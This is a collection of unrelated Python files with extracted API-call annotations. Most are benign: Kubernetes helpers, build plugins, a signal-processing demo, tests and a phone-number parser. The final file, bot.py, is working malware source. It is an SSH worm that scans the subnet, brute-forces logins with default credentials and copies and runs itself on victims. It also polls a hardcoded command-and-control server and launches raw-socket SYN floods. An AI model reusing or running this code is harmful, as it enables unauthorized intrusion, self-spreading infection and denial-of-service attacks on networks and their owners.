from kubernetes import client def prepare_secret(secret_kwargs=None): if not secret_kwargs: secret_kwargs = {} secret = client.V1Secret(**secret_kwargs) return secret def create_secret(api_instance, secret, namespace="default"): api_response = api_instance.create_namespaced_secret( body=secret, namespace=namespace ) return api_response def prepare_volume(volume_kwargs=None): if not volume_kwargs: volume_kwargs = {} volume = client.V1Volume(**volume_kwargs) return volume def create_volume(api_instance, volume, namespace="default"): api_response = api_instance.create_namespaced_volume( body=volume, namespace=namespace ) return api_response class StorageProvider: def __init__(self, config): self.config = config self.core_api = client.CoreV1Api() def provision(self): pass # Provision secrets # for # Provision volumes
[ "kubernetes.client.V1Volume", "kubernetes.client.V1Secret", "kubernetes.client.CoreV1Api" ]
[((139, 171), 'kubernetes.client.V1Secret', 'client.V1Secret', ([], {}), '(**secret_kwargs)\n', (154, 171), False, 'from kubernetes import client\n'), ((492, 524), 'kubernetes.client.V1Volume', 'client.V1Volume', ([], {}), '(**volume_kwargs)\n', (507, 524), False, 'from kubernetes import client\n'), ((846, 864), 'kubernetes.client.CoreV1Api', 'client.CoreV1Api', ([], {}), '()\n', (862, 864), False, 'from kubernetes import client\n')]
# Copyright © 2014, 2017 <NAME> # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # There is NO WARRANTY. """Initialize database tables for a new run, possibly copying URL-source tables from a previous one.""" def setup_argp(ap): ap.add_argument("-c", "--copy-from", action="store", type=int, metavar="N", help="Copy URL-source tables from run number N.") ap.add_argument("-x", "--exclude", help="Comma-separated list of tables *not* to copy." " (captured_pages and capture_detail are never copied.)") ap.add_argument("-q", "--quiet", help="Don't print any progress messages.") def run(args): from url_sources.newrun import make_new_run make_new_run(args)
[ "url_sources.newrun.make_new_run" ]
[((910, 928), 'url_sources.newrun.make_new_run', 'make_new_run', (['args'], {}), '(args)\n', (922, 928), False, 'from url_sources.newrun import make_new_run\n')]
import os.path from pants.backend.python.goals.setup_py import SetupKwargs, SetupKwargsRequest from pants.engine.fs import DigestContents, GlobMatchErrorBehavior, PathGlobs from pants.engine.rules import Get, collect_rules, rule from pants.engine.target import Target from pants.engine.unions import UnionRule class VersionedSetupKwargsRequest(SetupKwargsRequest): @classmethod def is_applicable(cls, _: Target) -> bool: # We always use our custom `setup()` kwargs generator for `python_distribution` # targets in this repo. return True @rule async def setup_kwargs_plugin(request: VersionedSetupKwargsRequest) -> SetupKwargs: kwargs = { "url": "https://github.com/CodeForAfrica/api", "author": "Code for Africa", "author_email": "<EMAIL>", "license": "MIT", "zip_safe": True, } kwargs |= request.explicit_kwargs.copy() # Add classifiers. We preserve any that were already set. standard_classifiers = [ "Intended Audience :: Developers", "License :: OSI Approved :: MIT", "Operating System :: MacOS :: MacOS X", "Operating System :: POSIX :: Linux", "Programming Language :: Python", "Topic :: Software Development :: Build Tools", ] kwargs["classifiers"] = [*standard_classifiers, *kwargs.get("classifiers", [])] project_urls = { "Source": "https://github.com/CodeForAfrica/api", "Tracker": "https://github.com/CodeForAfrica/api/issues", "Twitter": "https://twitter.com/Code4Africa", } kwargs["project_urls"] = {**project_urls, **kwargs.get("project_urls", {})} # version can be set to directly or via version_file relative to the BUILD file. version = kwargs.get("version", None) # version_file is not a standard kwarg, hence we need to pop it from kwargs. version_file = kwargs.pop("version_file", None) if version and version_file: raise ValueError( f"The python_distribution target {request.target.address} has supplied both " "`version` and `version_file` in its setup_py's kwargs. Only one of these " "should be supplied." ) # we default to checking VERSION file if both version and version_file are not set if not version: version_file = version_file or "VERSION" build_file_path = request.target.address.spec_path version_path = os.path.join(build_file_path, version_file) digest_contents = await Get( DigestContents, PathGlobs( [version_path], description_of_origin=f"the 'version_file' kwarg in {request.target.address}", glob_match_error_behavior=GlobMatchErrorBehavior.error, ), ) kwargs["version"] = digest_contents[0].content.decode().strip() return SetupKwargs(kwargs, address=request.target.address) def rules(): return ( *collect_rules(), UnionRule(SetupKwargsRequest, VersionedSetupKwargsRequest), )
[ "pants.backend.python.goals.setup_py.SetupKwargs", "pants.engine.rules.collect_rules", "pants.engine.fs.PathGlobs", "pants.engine.unions.UnionRule" ]
[((2873, 2924), 'pants.backend.python.goals.setup_py.SetupKwargs', 'SetupKwargs', (['kwargs'], {'address': 'request.target.address'}), '(kwargs, address=request.target.address)\n', (2884, 2924), False, 'from pants.backend.python.goals.setup_py import SetupKwargs, SetupKwargsRequest\n'), ((2987, 3045), 'pants.engine.unions.UnionRule', 'UnionRule', (['SetupKwargsRequest', 'VersionedSetupKwargsRequest'], {}), '(SetupKwargsRequest, VersionedSetupKwargsRequest)\n', (2996, 3045), False, 'from pants.engine.unions import UnionRule\n'), ((2962, 2977), 'pants.engine.rules.collect_rules', 'collect_rules', ([], {}), '()\n', (2975, 2977), False, 'from pants.engine.rules import Get, collect_rules, rule\n'), ((2554, 2723), 'pants.engine.fs.PathGlobs', 'PathGlobs', (['[version_path]'], {'description_of_origin': 'f"""the \'version_file\' kwarg in {request.target.address}"""', 'glob_match_error_behavior': 'GlobMatchErrorBehavior.error'}), '([version_path], description_of_origin=\n f"the \'version_file\' kwarg in {request.target.address}",\n glob_match_error_behavior=GlobMatchErrorBehavior.error)\n', (2563, 2723), False, 'from pants.engine.fs import DigestContents, GlobMatchErrorBehavior, PathGlobs\n')]
import numpy as np import sounddevice as sd import matplotlib.pyplot as plt import soundfile as sf from scipy import signal fs = 1000 time = np.arange(0,1,1/fs) def sound_lenght(second=0): x=int(fs*second) return x def DFT(x): # To calculate DFT of a 1D real-valued signal x N = len(x) n = np.arange(N) k = n.reshape((N, 1)) e = np.exp(-2j * np.pi * k * n / N) X = np.dot(e, x) return X amp=[0,1,0.1,0.01,0.001,0.0001] s3_freq=120 s3_add_freq=100 s3_sound_length=1 s3_amp=amp[1] sound=[] for i in range (0,sound_lenght(s3_sound_length)): sound.append( 0.5*np.sin(2*np.pi*(40)*i/fs) #+0.5*np.sin(2*np.pi*(150)*i/fs) +0.25*(np.random.rand()-0.5) ) X = DFT(sound) # calculate the frequency N = len(X) n = np.arange(N) T = N/fs freq = n/T n_oneside = N//2 # get the one side frequency f_oneside = freq[:n_oneside] # normalize the amplitude X_oneside =X[:n_oneside]/n_oneside plt.figure(figsize = (12, 6)) plt.subplot(323) plt.stem(f_oneside, abs(X_oneside), 'b', \ markerfmt=" ", basefmt="-b") plt.xlabel('Freq (Hz)') plt.ylabel('DFT Amplitude |X(freq)|') plt.subplot(324) plt.stem(f_oneside, abs(X_oneside), 'b', \ markerfmt=" ", basefmt="-b") plt.xlabel('Freq (Hz)') plt.xlim(0, 60) plt.tight_layout() plt.subplot(321) plt.plot(time[0:200],sound[0:200]) A=0 B=0 fsound=[] for i in range (0,N): X=sound[i] E=X+1.1429*A-0.4127*B Y=0.067*E+0.135*A+0.067*B fsound.append(Y) B=A A=E f2sound=[] for i in range (0,N): X=fsound[i] E=X+1.1429*A-0.4127*B Y=0.067*E+0.135*A+0.067*B f2sound.append(Y) B=A A=E plt.subplot(322) plt.plot(time[0:200],f2sound[0:200]) X1 = DFT(f2sound) # calculate the frequency N1= len(X1) n1 = np.arange(N1) T1 = N1/fs freq1 = n1/T1 n_oneside1 = N1//2 # get the one side frequency f_oneside1 = freq1[:n_oneside1] # normalize the amplitude X_oneside1 =X1[:n_oneside1]/n_oneside1 plt.figure(figsize = (12, 6)) plt.subplot(325) plt.stem(f_oneside1, abs(X_oneside1), 'b', markerfmt=" ", basefmt="-b") plt.xlabel('Freq (Hz)') plt.ylabel('DFT Amplitude |X(freq)|') plt.subplot(326) plt.stem(f_oneside1, abs(X_oneside1), 'b', markerfmt=" ", basefmt="-b") plt.xlabel('Freq (Hz)') plt.xlim(0, 60) plt.tight_layout() plt.show()
[ "numpy.random.rand", "matplotlib.pyplot.ylabel", "matplotlib.pyplot.xlabel", "matplotlib.pyplot.plot", "numpy.exp", "matplotlib.pyplot.figure", "numpy.dot", "matplotlib.pyplot.tight_layout", "numpy.sin", "matplotlib.pyplot.xlim", "matplotlib.pyplot.subplot", "numpy.arange", "matplotlib.pyplot.show" ]
[((142, 165), 'numpy.arange', 'np.arange', (['(0)', '(1)', '(1 / fs)'], {}), '(0, 1, 1 / fs)\n', (151, 165), True, 'import numpy as np\n'), ((828, 840), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (837, 840), True, 'import numpy as np\n'), ((1001, 1028), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (1011, 1028), True, 'import matplotlib.pyplot as plt\n'), ((1031, 1047), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(323)'], {}), '(323)\n', (1042, 1047), True, 'import matplotlib.pyplot as plt\n'), ((1129, 1152), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (1139, 1152), True, 'import matplotlib.pyplot as plt\n'), ((1153, 1190), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""DFT Amplitude |X(freq)|"""'], {}), "('DFT Amplitude |X(freq)|')\n", (1163, 1190), True, 'import matplotlib.pyplot as plt\n'), ((1192, 1208), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(324)'], {}), '(324)\n', (1203, 1208), True, 'import matplotlib.pyplot as plt\n'), ((1290, 1313), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (1300, 1313), True, 'import matplotlib.pyplot as plt\n'), ((1314, 1329), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0)', '(60)'], {}), '(0, 60)\n', (1322, 1329), True, 'import matplotlib.pyplot as plt\n'), ((1330, 1348), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1346, 1348), True, 'import matplotlib.pyplot as plt\n'), ((1350, 1366), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(321)'], {}), '(321)\n', (1361, 1366), True, 'import matplotlib.pyplot as plt\n'), ((1367, 1402), 'matplotlib.pyplot.plot', 'plt.plot', (['time[0:200]', 'sound[0:200]'], {}), '(time[0:200], sound[0:200])\n', (1375, 1402), True, 'import matplotlib.pyplot as plt\n'), ((1700, 1716), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(322)'], {}), '(322)\n', (1711, 1716), True, 'import matplotlib.pyplot as plt\n'), ((1717, 1754), 'matplotlib.pyplot.plot', 'plt.plot', (['time[0:200]', 'f2sound[0:200]'], {}), '(time[0:200], f2sound[0:200])\n', (1725, 1754), True, 'import matplotlib.pyplot as plt\n'), ((1822, 1835), 'numpy.arange', 'np.arange', (['N1'], {}), '(N1)\n', (1831, 1835), True, 'import numpy as np\n'), ((2010, 2037), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (2020, 2037), True, 'import matplotlib.pyplot as plt\n'), ((2040, 2056), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(325)'], {}), '(325)\n', (2051, 2056), True, 'import matplotlib.pyplot as plt\n'), ((2129, 2152), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (2139, 2152), True, 'import matplotlib.pyplot as plt\n'), ((2153, 2190), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""DFT Amplitude |X(freq)|"""'], {}), "('DFT Amplitude |X(freq)|')\n", (2163, 2190), True, 'import matplotlib.pyplot as plt\n'), ((2192, 2208), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(326)'], {}), '(326)\n', (2203, 2208), True, 'import matplotlib.pyplot as plt\n'), ((2281, 2304), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (2291, 2304), True, 'import matplotlib.pyplot as plt\n'), ((2305, 2320), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0)', '(60)'], {}), '(0, 60)\n', (2313, 2320), True, 'import matplotlib.pyplot as plt\n'), ((2321, 2339), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2337, 2339), True, 'import matplotlib.pyplot as plt\n'), ((2341, 2351), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2349, 2351), True, 'import matplotlib.pyplot as plt\n'), ((314, 326), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (323, 326), True, 'import numpy as np\n'), ((361, 394), 'numpy.exp', 'np.exp', (['(-2.0j * np.pi * k * n / N)'], {}), '(-2.0j * np.pi * k * n / N)\n', (367, 394), True, 'import numpy as np\n'), ((401, 413), 'numpy.dot', 'np.dot', (['e', 'x'], {}), '(e, x)\n', (407, 413), True, 'import numpy as np\n'), ((621, 652), 'numpy.sin', 'np.sin', (['(2 * np.pi * 40 * i / fs)'], {}), '(2 * np.pi * 40 * i / fs)\n', (627, 652), True, 'import numpy as np\n'), ((721, 737), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (735, 737), True, 'import numpy as np\n')]
import pytest from _mock_data.url import internal_url from browserist import Browser @pytest.mark.parametrize("url, xpath, expected", [ (internal_url.EXAMPLE_COM, "/html/body/div/h1", True), (internal_url.EXAMPLE_COM, "/html/body/div/p[2]/a", True), (internal_url.W3SCHOOLS_COM, "//*[@id='main']/div[1]/div/h1", True), (internal_url.W3SCHOOLS_COM, "//*[@id='main']/footer", True), (internal_url.W3SCHOOLS_COM, "//*[@id='main']/div[14]/h2", True), (internal_url.W3SCHOOLS_COM, "//*[@id='google_translate_element']", False), ]) def test_check_if_is_displayed(url: str, xpath: str, expected: bool, browser_default_headless: Browser) -> None: browser = browser_default_headless browser.open.url(url) assert browser.check_if.is_displayed(xpath) is expected
[ "pytest.mark.parametrize" ]
[((89, 549), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""url, xpath, expected"""', '[(internal_url.EXAMPLE_COM, \'/html/body/div/h1\', True), (internal_url.\n EXAMPLE_COM, \'/html/body/div/p[2]/a\', True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'main\']/div[1]/div/h1", True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'main\']/footer", True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'main\']/div[14]/h2", True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'google_translate_element\']", False)]'], {}), '(\'url, xpath, expected\', [(internal_url.EXAMPLE_COM,\n \'/html/body/div/h1\', True), (internal_url.EXAMPLE_COM,\n \'/html/body/div/p[2]/a\', True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'main\']/div[1]/div/h1", True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'main\']/footer", True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'main\']/div[14]/h2", True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'google_translate_element\']", False)])\n', (112, 549), False, 'import pytest\n')]
# -*- coding=utf-8 -*- from typing import Dict import re from . import data from .exception import InvalidCharacterException, InvalidTelephoneNumberException number_and_hyphen_regexp = re.compile(r'^[−ー0-90-9-]+$') telephone_number_regexp = re.compile(r'^[0-90-9]{10,11}$') # ハイフン無し telephone_number_with_hyphen_regex = re.compile(r'^[0-90-9]{2,4}[−ー-][0-90-9]{2,4}[−ー-][0-90-9]{3,4}$') # ハイフン有り _translate_table = str.maketrans({ '0': '0', '1': '1', '2': '2', '3': '3', '4': '4', '5': '5', '6': '6', '7': '7', '8': '8', '9': '9', 'ー': '-', '−': '-', }) def generate_dict(number: str, area_code_length: int, city_code_length: int) -> Dict[str, str]: total_code_length = area_code_length + city_code_length if len(number) < total_code_length: raise InvalidTelephoneNumberException return { 'area_code': number[:area_code_length], 'city_code': number[area_code_length:total_code_length], 'subscriber_code': number[total_code_length:], } def zenkaku_to_hankaku(number: str) -> str: return number.translate(_translate_table) def extract_number(src: str) -> str: """全角半角やハイフンが混じった文字列を半角数字のみの文字列にして返す""" m = number_and_hyphen_regexp.fullmatch(src) if not m: raise InvalidCharacterException return zenkaku_to_hankaku(m.string).replace('-', '') def split(src: str) -> Dict[str, str]: """入力された文字列を辞書形式に分割して返す""" number = extract_number(src) # 固定電話 for codes in [data.area_code_5, data.area_code_4, data.area_code_3, data.area_code_2]: for code in codes: if number.startswith(code): area_code_length = len(code) city_code_length = data.TOTAL_CODE_LENGTH - area_code_length return generate_dict(number, area_code_length, city_code_length) # フリーダイヤル for code in data.freedial_code: if number.startswith(code): return generate_dict(number, data.FREEDIAL_CODE_PREFIX_LENGTH, data.FREEDIAL_CODE_LENGTH) # 携帯電話 for code in data.mobile_code: if number.startswith(code): return generate_dict(number, data.MOBILE_CODE_PREFIX_LENGTH, data.MOBILE_CODE_LENGTH) # その他番号 for code in data.other_code: if number.startswith(code): return generate_dict(number, data.OTHER_CODE_PREFIX_LENGTH, data.OTHER_CODE_LENGTH) raise InvalidTelephoneNumberException def validate(src: str) -> bool: if not telephone_number_regexp.fullmatch(src) and not telephone_number_with_hyphen_regex.fullmatch(src): return False try: split(src) except (InvalidTelephoneNumberException, InvalidTelephoneNumberException): return False return True def normalize(src: str) -> str: """入力された文字列をハイフン区切りの電話番号にして返す""" number = extract_number(src) code = split(number) return '{}-{}-{}'.format(code['area_code'], code['city_code'], code['subscriber_code'])
[ "re.compile" ]
[((187, 215), 're.compile', 're.compile', (['"""^[−ー0-90-9-]+$"""'], {}), "('^[−ー0-90-9-]+$')\n", (197, 215), False, 'import re\n'), ((243, 274), 're.compile', 're.compile', (['"""^[0-90-9]{10,11}$"""'], {}), "('^[0-90-9]{10,11}$')\n", (253, 274), False, 'import re\n'), ((323, 388), 're.compile', 're.compile', (['"""^[0-90-9]{2,4}[−ー-][0-90-9]{2,4}[−ー-][0-90-9]{3,4}$"""'], {}), "('^[0-90-9]{2,4}[−ー-][0-90-9]{2,4}[−ー-][0-90-9]{3,4}$')\n", (333, 388), False, 'import re\n')]
import os from setuptools import setup def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() setup( name = "zeppelin_comm_layer", version = "0.9.3", author = "<NAME>", author_email = "<EMAIL>", description = ("A simulation of the Jupyter/IPython display/communication system " "to allow libraries like Bokeh to run inline in Apache Zeppelin"), license = "Apache License 2.0", keywords = "zeppelin visualisations", packages=['zeppelin_comm_layer'], package_data={'zeppelin_comm_layer': ['js/*']}, long_description=read('Readme.md'), classifiers=[ "Development Status :: 4 - Beta", "Topic :: Utilities", "Programming Language :: Python'", "Programming Language :: Python :: 2'", "Programming Language :: Python :: 3'" ] )
[ "os.path.dirname" ]
[((86, 111), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (101, 111), False, 'import os\n')]
#!/usr/bin/python """bot.py External Dependencies: nmap for network mapping paramiko for ssh & sftp """ # standard lib import logging import os import random import socket import stat import struct import subprocess import sys import threading import time # third-party lib import nmap import paramiko # CONSTANTS MASTER = '192.168.1.3' # C2 server IPv4 address PORT = 1337 ID = socket.gethostbyname(socket.gethostname()) BOT_FILE_PATH = '/tmp/bot.py' DELIMITER = '::' MAX_THREAD = 100 # must be less than max thread limit # GLOBALS state = -1 # 0 ready, 1 attacking, 2 enrolled for attack, 3 stop attacking credentials = [ ('ubuntu', 'ubuntu'), ('pi', 'raspberry'), ('admin', 'password'), ('cpsc', 'cpsc') ] logging.basicConfig(level=logging.INFO, format='%(asctime)s PID:%(process)d %(threadName)s %(message)s', datefmt='%H:%M:%S', filename='/tmp/bot.log') logger = logging.getLogger('') ################################################################## # WORM # A simple ssh worm that: # 1. Uses nmap to scan the local subnet for IP systems which have # ssh open on the default port, 22. # 2. Attempts to gain access by bruteforce with a pre-set list # of credentials # 3. If connected, copy self to the victim and begin execution # on the victim ################################################################## def access_system(host): """ Perform a brute force attack against a host system @param host: hostname/ip of target system @return: tuple of instance of paramiko SSH class, successful username, succesful password; None otherwise """ global credentials ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) logger.info('Accessing {}'.format(host)) for (username, password) in credentials: result = try_credentials(host, username, password, ssh) if result == 0: return (ssh, username, password) logger.info('Could not access {}'.format(host)) return None def get_targets(subnet): """ Get list of target systems @param subnet: the target subnet; example '192.168.1.1/24' @return: list of potential target hosts with default ssh port open, 22 """ nm = nmap.PortScanner() hosts = [] nm.scan(subnet, arguments='-p 22 --open') hosts = nm.all_hosts() targets = [] for host in hosts: if nm[host].state() == 'up' and host != MASTER and \ host != ID and not host.startswith('127.'): targets.append(host) return targets def spread(sshclient): """ Spread to target victim system and start the bot @param sshclient: instance of paramiko SSH class connected to a system """ sftp = sshclient.open_sftp() sftp.put(os.path.abspath(sys.argv[0]), BOT_FILE_PATH) sftp.chmod(BOT_FILE_PATH, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU) sftp.close() sshclient.exec_command('python ' + BOT_FILE_PATH) #sshclient.exec_command('python3 ' + BOT_FILE_PATH) def try_credentials(host, username, password, sshclient): """ Try connecting to a host with a set of credentials @param host: hostname/ip of target system @param username: username to try @param password: password to try @param sshclient: instance of paramiko SSH class @return: 0 for success; -1 for socket error; 1 for wrong credentials, maybe """ try: sshclient.connect(host, username=username, password=password) except paramiko.AuthenticationException: return 1 except paramiko.SSHException: return 1 except socket.error: return -1 return 0 def worm_driver(target): """ Driver for the worm @param target: ipv4 address of beginning target @side-effect: when done, sets bot state to ready """ logger.info('LOADING WORM') global state state = 1 targets = get_targets(target + '/24') logger.info('worm targets: {}'.format(targets)) for target in targets: sshInfo = access_system(target) if sshInfo: sftp = sshInfo[0].open_sftp() try: sftp.get(BOT_FILE_PATH, '/tmp/' + target + '.txt') logger.info('{} is a friend'.format(target)) except IOError: logger.info('Infecting {}'.format(target)) spread(sshInfo[0]) finally: os.remove('/tmp/' + target + '.txt') sftp.close() sshInfo[0].close() state = 0 logger.info('TERMINATING WORM') ################################################################## # BOT # Communication is transmitted via UDP # Messages accepted from C2 server: # 'ROLL': roll call to check for bot's state # 'ATCK': launch an attack; see atck_command for more details # 'STOP': terminate active attacks # Messages sent to C2 server: # 'HELO': tells the C2 server that bot is up # 'REDY': response to 'ROLL' for bot in ready state # 'BUSY': response to 'ROLL' for bot not in ready state # NOTE: raw sockets & scapy module require root privileges ################################################################## def atck_command(tokens): """ Processes an attack message from the C2 server Attack 0: spread bot Attack 1: syn flood NOTE: remember to check for stopping state in the attacks and to reset to ready state when attack ends @param tokens: tokenized attack command in the following format: ['ATCK', <int for attack type>, <target IPv4 address>] @side-effect: sets bot state to attacking """ global state if state != 2: # check for enrolled state return try: atck_type = int(tokens[1]) target = tokens[2] state = 1 logger.info('Starting attack {} on {}'.format(atck_type, target)) if target == MASTER or target.startswith('127.'): state = 0 return if atck_type == 0: # spread the bot, ignores stop command worm_driver(target) elif atck_type == 1: # syn flood syn_flood(target) except (ValueError, IndexError): return def hello(): """ Sends a 'HELO' message to the C2 server every minute """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) while True: sock.sendto('HELO', (MASTER, PORT)) #sock.sendto(bytes('HELO', 'utf-8'), (MASTER, PORT)) time.sleep(60) sock.close() def process_commands(message): """ Processes commands received from the C2 server @param message: message from the C2 server """ tokens = message.split(DELIMITER) command = tokens[0] if command == 'ROLL': roll_command() elif command == 'ATCK': atck_command(tokens) elif command == 'STOP': stop_command() else: return def roll_command(): """ Sends a 'REDY' message if bot is in ready state, 'BUSY' otherwise """ global state sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) if state == 0: state = 2 sock.sendto('REDY', (MASTER, PORT)) #sock.sendto(bytes('REDY', 'utf-8'), (MASTER, PORT)) else: sock.sendto('BUSY', (MASTER, PORT)) #sock.sendto(bytes('BUSY', 'utf-8'), (MASTER, PORT)) sock.close() def stop_command(): """ Terminate any active attacks @side- effect: sets bot state to ready """ global state state = 3 time.sleep(5) # should be long enough for attack threads to see stop state state = 0 def syn_flood(target): """ Perform a syn flood on target system @param target: IPv4 of system to attack """ count = 0 while state == 1 and count < MAX_THREAD: count = count + 1 threading.Thread(target=tcp_syn, args=(target,)).start() def bot_driver(): """ Driver for the bot """ logger.info('LOADING BOT') global state threading.Thread(target=hello).start() master_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) master_sock.bind(('', PORT)) #state = 0 # don't set bot to ready yet. potential race condition with worm driver while True: message = master_sock.recv(1024) logger.info('Received: {}'.format(message)) threading.Thread(target=process_commands, args=(message,)).start() master_sock.close() ################################################################## # SYN FLOOD ################################################################## def calculate_tcp_checksum(message): """ Calculate the TCP checksum @param message: payload + TCP headers + pseudoheader @return: 16-bit TCP checksum value """ cs = 0 for i in range(0, len(message), 2): w = (ord(message[i])<<8 + ord(message[i+1])) cs = cs + w cs = (cs>>16) + (cs & 0xffff) cs = ~cs & 0xffff return cs def create_ip_header(src, dst): """ Create the IP header @param src: source IPv4 address in binary format @param dst: destination IPv4 address in binary format @return: IPv4 header """ # IPv4 header fields v_ihl = 69 # 0x45; version 4, internet header length 5 dscp_ecn = 0 # type of service total_len = 20 + 20 # length of packet; ip header + tcp header ident = random.randint(0, 65535) # identification flag_frag = 0 # flag and fragment offset ttl = 255 # time to live protocol = socket.IPPROTO_TCP # protocol; TCP checksum = 0 # checksum value; python fills this out?? return struct.pack('!BBHHHBBH4s4s', v_ihl, dscp_ecn, total_len, ident, flag_frag, ttl, protocol, checksum, src, dst) def create_tcp_header(src, dst): """ Create the TCP header @param src: source IPv4 address in binary format @param dst: destination IPv4 address in binary format @return: TCP header """ # TCP header fields src_port = 8008 #random.randint(1024, 65535) # source port, non-privileged dest_port = 80 # destination port; http seq = 0 # sequence number ack = 0 # acknowledgement number offset_reserved = 0x50 # data offset and reserved flags = 2 # TCP flags; SYN flag = 1 window = socket.htons(5840) # window size checksum = 0 # checksum value urg = 0 # urgent pointer temp = struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack, offset_reserved, flags, window, checksum, urg) # Psuedo header fields protocol = socket.IPPROTO_TCP # protocol; TCP tcp_len = len(temp) # length of tcp header + payload psh = struct.pack('!4s4sHH', src, dst, protocol, tcp_len) checksum = calculate_tcp_checksum(psh + temp) return struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack, offset_reserved, flags, window, checksum, urg) def create_tcp_syn_packet(target): """ Create the TCP SYN packet @param target: IPv4 address @return: TCP SYN packet """ ''' a = random.randint(1,255) b = random.randint(1,255) c = random.randint(1,255) d = random.randint(1,255) src_ip = '{}.{}.{}.{}'.format(a, b, c, d) # spoofed ip ''' src_ip = ID src = socket.inet_aton(src_ip) # source IP address dst = socket.inet_aton(target) # destination IP address packet = create_ip_header(src, dst) + create_tcp_header(src, dst) return packet def tcp_syn(target): try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) while state == 1: packet = create_tcp_syn_packet(target) for _ in xrange(100): if state != 1: break sock.sendto(packet, (target , 0)) sock.close() except: # no root privilege while state == 1: os.system('nc ' + target + ' 80') ################################################################## # MAIN DRIVER # Starts the worm driver and the bot driver ################################################################## def main(): """ Main driver for the bot """ global ID if ID.startswith('127.'): # maybe in a VM environment try: import netinfo ID = netinfo.get_ip('enp0s3') except: pass threading.Thread(target=bot_driver).start() threading.Thread(target=worm_driver, args=(ID,)).start() if __name__ == '__main__': main()
[ "logging.basicConfig", "logging.getLogger", "netinfo.get_ip", "paramiko.SSHClient", "socket.socket", "nmap.PortScanner", "paramiko.AutoAddPolicy", "os.system", "socket.htons", "time.sleep", "struct.pack", "socket.inet_aton", "os.path.abspath", "threading.Thread", "socket.gethostname", "random.randint", "os.remove" ]
[((737, 896), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': '"""%(asctime)s PID:%(process)d %(threadName)s %(message)s"""', 'datefmt': '"""%H:%M:%S"""', 'filename': '"""/tmp/bot.log"""'}), "(level=logging.INFO, format=\n '%(asctime)s PID:%(process)d %(threadName)s %(message)s', datefmt=\n '%H:%M:%S', filename='/tmp/bot.log')\n", (756, 896), False, 'import logging\n'), ((956, 977), 'logging.getLogger', 'logging.getLogger', (['""""""'], {}), "('')\n", (973, 977), False, 'import logging\n'), ((411, 431), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (429, 431), False, 'import socket\n'), ((1722, 1742), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (1740, 1742), False, 'import paramiko\n'), ((2318, 2336), 'nmap.PortScanner', 'nmap.PortScanner', ([], {}), '()\n', (2334, 2336), False, 'import nmap\n'), ((6357, 6405), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (6370, 6405), False, 'import socket\n'), ((7087, 7135), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (7100, 7135), False, 'import socket\n'), ((7556, 7569), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (7566, 7569), False, 'import time\n'), ((8085, 8133), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (8098, 8133), False, 'import socket\n'), ((9388, 9412), 'random.randint', 'random.randint', (['(0)', '(65535)'], {}), '(0, 65535)\n', (9402, 9412), False, 'import random\n'), ((9625, 9738), 'struct.pack', 'struct.pack', (['"""!BBHHHBBH4s4s"""', 'v_ihl', 'dscp_ecn', 'total_len', 'ident', 'flag_frag', 'ttl', 'protocol', 'checksum', 'src', 'dst'], {}), 